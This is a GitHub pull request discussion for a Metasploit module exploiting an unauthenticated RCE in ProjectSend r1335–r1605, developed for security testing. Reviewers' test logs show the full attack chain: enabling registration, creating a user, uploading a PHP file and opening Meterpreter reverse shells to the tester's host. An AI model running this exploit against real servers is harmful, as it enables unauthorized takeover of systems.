-
Notifications
You must be signed in to change notification settings - Fork 14k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
ProjectSend r1335 - r1605 RCE module #19531
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hello ostrichgolf, Thanks for your PR!
I've left couple of comments, question and improvement for the module along with some logs of the testing.
ProjectSend r1605 on Docker
msf6 exploit(linux/http/projectsend_unauth_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(linux/http/projectsend_unauth_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/projectsend_unauth_rce) > set rport 8080
rport => 8080
msf6 exploit(linux/http/projectsend_unauth_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Client registration successfully enabled
[+] User troy_okeefe created with password fiuYFr22
[*] Disabling upload restrictions...
[*] Logging in as troy_okeefe...
[-] Exploit aborted due to failure: no-access: Failed to authenticate. This can happen, you should try to execute the exploit again
[+] Client registration successfully disabled
[*] Enabling upload restrictions...
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/projectsend_unauth_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Client registration successfully enabled
[+] User alphonse created with password vBbTZFYI
[*] Disabling upload restrictions...
[*] Logging in as alphonse...
[+] Logged in as alphonse
[+] Successfully uploaded PHP file: fw9G20My.php
[*] Sending stage (39927 bytes) to 172.19.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.19.0.2:59904) at 2024-10-07 07:38:40 -0400
[*] Logging in as alphonse...
[+] Logged in as alphonse
[+] Client registration successfully disabled
[*] Enabling upload restrictions...
meterpreter > sysinfo
Computer : fe50101fbbdc
OS : Linux fe50101fbbdc 6.10.9-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.10.9-1kali1 (2024-09-09) x86_64
Meterpreter : php/linux
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(linux/http/projectsend_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > exit
[*] Shutting down session: 1
[*] 127.0.0.1 - Meterpreter session 1 closed. Reason: User exit
msf6
documentation/modules/exploit/linux/http/projectsend_unauth_rce.md
Outdated
Show resolved
Hide resolved
@jheysel-r7 / @dledda-r7 : Is there anything you need from me to move this toward merging? |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hey @ostrichgolf there's a couple more changes that need to be made, mostly regarding the need for the check method to return a CheckCode
. Otherwise the modules looking great. Let me know if you have any questions. Cheers.
39c2fa4
to
68eb659
Compare
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great work @ostrichgolf, thanks for the module. I've retested and everything looks good 👍
msf6 exploit(linux/http/projectsend_unauth_rce) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Client registration successfully enabled
[+] User renaldo created with password YzE5IWV4
[*] Disabling upload restrictions...
[*] Logging in as renaldo...
[+] Logged in as renaldo
[+] Successfully uploaded PHP file: TiZvhJWJ.php
[*] Sending stage (39927 bytes) to 172.16.199.132
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:57952) at 2024-11-21 09:36:45 -0800
[*] Logging in as renaldo...
[+] Logged in as renaldo
[+] Client registration successfully disabled
[*] Enabling upload restrictions...
meterpreter > sysinfo
Computer : 7837b0b51ebf
OS : Linux 7837b0b51ebf 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 368 created.
Channel 0 created.
id
uid=1000(abc) gid=1000(users) groups=1000(users)
Release NotesAdds a new exploit module targeting ProjectSend versions r1335 through r1605. The module exploits an improper authorization vulnerability, allowing unauthenticated RCE by manipulating the application's configuration settings. |
This PR is a duplicate of #19433, however this comes from a unique branch as instructed by @jheysel-r7.
Original PR message added for clarity:
This pull request adds a new exploit module targeting ProjectSend versions r1335 through r1605.
The module exploits an improper authorization vulnerability, allowing unauthenticated RCE by manipulating the application's configuration settings.
This exploit is largely based on the advisory by Synacktiv, which can be found here.
For the exploit to work, it is necessary to enable client registration, allow all users to upload files, and enable automatic approval of new clients. Since these settings are unknown prior to or during exploitation, the module provides an option to reset them to their default secure state after exploitation, as a more secure alternative.
Verification steps
The following Docker Compose file can be used to set up a vulnerable environment:
After launching the containers, ProjectSend requires initial configuration, which can be completed by accessing port 80 on localhost.
The exploit has been tested and confirmed to work against the following versions:
Known Issues